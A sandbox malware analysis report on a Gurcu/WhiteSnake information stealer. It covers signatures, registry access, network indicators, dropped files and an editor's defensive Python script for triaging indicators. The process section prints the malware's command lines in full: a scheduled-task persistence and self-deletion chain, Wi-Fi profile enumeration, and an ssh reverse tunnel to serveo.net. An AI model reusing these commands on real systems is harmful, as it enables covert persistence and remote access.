Malware Analysis Report

2024-10-19 06:43

Sample ID 230909-rach3sbf43
Target 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
Tags
gurcu collection discovery spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538

Threat Level: Known bad

The file 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe was found to be: Known bad.

Malicious Activity Summary

gurcu collection discovery spyware stealer

Detect Gurcu Stealer V3 payload

Gurcu, WhiteSnake

Gurcu family

Deletes itself

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Checks installed software on the system

Accesses Microsoft Outlook profiles

Looks up external IP address via web service

Drops file in System32 directory

Enumerates physical storage devices

Checks processor information in registry

outlook_office_path

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

outlook_win_path

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Creates scheduled task(s)

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-09-09 13:59

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A

Gurcu family

gurcu

Analysis: behavioral2

Detonation Overview

Submitted

2023-09-09 13:58

Reported

2023-09-09 14:01

Platform

win10v2004-20230831-en

Max time kernel

154s

Max time network

155s

Command Line

C:\Windows\System32\svchost.exe -k netsvcs -p

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gurcu, WhiteSnake

stealer gurcu

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{899F939A-FC9F-4822-A3C8-2481478AB348}.catalogItem C:\Windows\System32\svchost.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\System32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\System32\svchost.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\System32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\svchost.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1416 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\System32\cmd.exe
PID 1416 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\System32\cmd.exe
PID 4944 wrote to memory of 1972 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 4944 wrote to memory of 1972 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 4944 wrote to memory of 4860 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 4944 wrote to memory of 4860 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 4944 wrote to memory of 1288 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4944 wrote to memory of 1288 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4944 wrote to memory of 2348 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
PID 4944 wrote to memory of 2348 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
PID 2348 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\SYSTEM32\cmd.exe
PID 2348 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\SYSTEM32\cmd.exe
PID 3044 wrote to memory of 2156 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 3044 wrote to memory of 2156 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 3044 wrote to memory of 624 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 3044 wrote to memory of 624 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 3044 wrote to memory of 2728 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 3044 wrote to memory of 2728 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 2348 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\SYSTEM32\cmd.exe
PID 2348 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\SYSTEM32\cmd.exe
PID 548 wrote to memory of 5068 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 548 wrote to memory of 5068 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 548 wrote to memory of 1176 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 548 wrote to memory of 1176 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 548 wrote to memory of 2996 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 548 wrote to memory of 2996 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 2348 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\System32\OpenSSH\ssh.exe
PID 2348 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\System32\OpenSSH\ssh.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A

Processes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p

C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping 127.0.0.1

C:\Windows\system32\schtasks.exe

schtasks /create /tn "6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Windows\System32\OpenSSH\ssh.exe

"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:8664 serveo.net

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
N/A 127.0.0.1:8664 tcp
US 8.8.8.8:53 serveo.net udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
DE 159.89.214.31:22 serveo.net tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 31.214.89.159.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 232.200.77.51.in-addr.arpa udp
US 8.8.8.8:53 11.78.23.94.in-addr.arpa udp
US 8.8.8.8:53 175.238.145.217.in-addr.arpa udp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
US 8.8.8.8:53 254.1.248.8.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
FR 94.23.78.11:8080 94.23.78.11 tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
US 8.8.8.8:53 9.173.189.20.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 tcp
FR 94.23.78.11:8080 tcp
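The network table above mixes indicators with sandbox noise. Every in-addr.arpa row is the analysis VM reverse-resolving peers it saw, 8.8.8.8:53 is the VM's resolver, and 127.0.0.1:8664 is the local side of the ssh -R forward. What remains is four named hosts (ip-api.com, which the report's own signature ties to the external IP lookup; serveo.net, the tunnel endpoint from the ssh.exe command line; api.telegram.org and transfer.sh, whose role the report does not state) and three hard-coded IP destinations, of which the two French hosts on port 8080 are contacted over and over, which looks like a beacon or retry loop. The Python below is an added example by the editor, not part of the report: it parses rows in the table's flattened layout, drops the noise, counts repeated direct-IP connections and emits a deduplicated hunt list. The rows are embedded as a constructed, abridged copy of the table (one instance of each distinct row plus a few of the repeats), and the role annotations marked "inferred" are mine.

```python
from collections import Counter

# Constructed input: rows copied from the report's Network table, abridged to one
# instance of each distinct row plus a few of the repeated 8080 connections.
NETWORK_ROWS = """\
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
N/A 127.0.0.1:8664 tcp
US 8.8.8.8:53 serveo.net udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
DE 159.89.214.31:22 serveo.net tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 tcp
FR 94.23.78.11:8080 tcp
"""

SANDBOX_RESOLVER = "8.8.8.8:53"   # the analysis VM's DNS server, not an IOC

# Role of each named host. The first two come from the report itself; the two
# marked "inferred" are my assumption and are not stated anywhere in the report.
ROLE = {
    "ip-api.com": "external IP lookup (report signature)",
    "serveo.net": "endpoint of the ssh -R tunnel (ssh.exe command line)",
    "api.telegram.org": "inferred: likely exfiltration channel",
    "transfer.sh": "inferred: likely file upload channel",
}


def parse_rows(text):
    """Split the flattened 'Country Destination [Domain] Proto' rows."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        rows.append({"country": parts[0], "dest": parts[1],
                     "domain": parts[2] if len(parts) == 4 else "",
                     "proto": parts[-1]})
    return rows


def classify(row):
    host = row["dest"].rpartition(":")[0]
    if row["domain"].endswith(".in-addr.arpa"):
        return "ptr_noise"        # sandbox reverse-DNS of peers it saw
    if host.startswith("127."):
        return "loopback"         # local side of the ssh -R forward (port 8664)
    if row["dest"] == SANDBOX_RESOLVER:
        return "dns_lookup"       # the queried name itself is the indicator
    if row["domain"] in ("", host):
        return "direct_ip"        # no hostname: hard-coded C2 candidates
    return "named_host"


def triage_network(text):
    s = {"ptr_noise": 0, "loopback": [], "dns_lookup": set(),
         "direct_ip": Counter(), "named_host": {}}
    for row in parse_rows(text):
        kind = classify(row)
        if kind == "ptr_noise":
            s["ptr_noise"] += 1
        elif kind == "loopback":
            s["loopback"].append(row["dest"])
        elif kind == "dns_lookup":
            s["dns_lookup"].add(row["domain"])
        elif kind == "direct_ip":
            s["direct_ip"][row["dest"]] += 1
        else:
            s["named_host"][row["domain"]] = f'{row["dest"]} ({row["country"]})'
    return s


def hunt_iocs(text):
    """Deduplicated, noise-free indicators suitable for a block list or hunt query."""
    s = triage_network(text)
    return sorted(s["dns_lookup"] | set(s["named_host"]) | set(s["direct_ip"]))


if __name__ == "__main__":
    s = triage_network(NETWORK_ROWS)
    print(f"dropped {s['ptr_noise']} PTR rows; loopback: {s['loopback']}")
    for dest, n in s["direct_ip"].most_common():
        print(f"direct-IP connection {dest}: {n}x")
    for name, where in s["named_host"].items():
        print(f"{name:18s} {where:24s} {ROLE.get(name, 'unknown')}")
    print("IOCs:", hunt_iocs(NETWORK_ROWS))
```

The count of direct-IP connections is the most useful number here: on the full table the two 8080 hosts dominate, so they belong at the top of the block list, while the single-shot 217.145.238.175:80 and the public services need a second look before blocking (api.telegram.org and transfer.sh are legitimate services that a block rule would hit broadly).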

Files

memory/1416-0-0x000001E3212B0000-0x000001E321312000-memory.dmp

memory/1416-2-0x00007FFBA4F60000-0x00007FFBA5A21000-memory.dmp

memory/1416-3-0x000001E3216E0000-0x000001E3216F0000-memory.dmp

memory/1416-7-0x00007FFBA4F60000-0x00007FFBA5A21000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

MD5 a43b860d290321de53ed6deb5cae95af
SHA1 62cc70d91f7e39fc93b9b0f106f78a90cfc54047
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
SHA512 535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

MD5 a43b860d290321de53ed6deb5cae95af
SHA1 62cc70d91f7e39fc93b9b0f106f78a90cfc54047
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
SHA512 535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe.log

MD5 3308a84a40841fab7dfec198b3c31af7
SHA1 4e7ab6336c0538be5dd7da529c0265b3b6523083
SHA256 169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
SHA512 97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198

memory/2348-18-0x00007FFBA4E30000-0x00007FFBA58F1000-memory.dmp

memory/2348-19-0x0000022C76A20000-0x0000022C76A30000-memory.dmp

memory/2348-22-0x00007FFBA4E30000-0x00007FFBA58F1000-memory.dmp

memory/2348-23-0x0000022C76A20000-0x0000022C76A30000-memory.dmp

memory/2348-24-0x0000022C76C70000-0x0000022C76E19000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-09 13:58

Reported

2023-09-09 14:01

Platform

win7-20230831-en

Max time kernel

150s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gurcu, WhiteSnake

stealer gurcu

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (certificate blob omitted) C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate blob omitted) C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
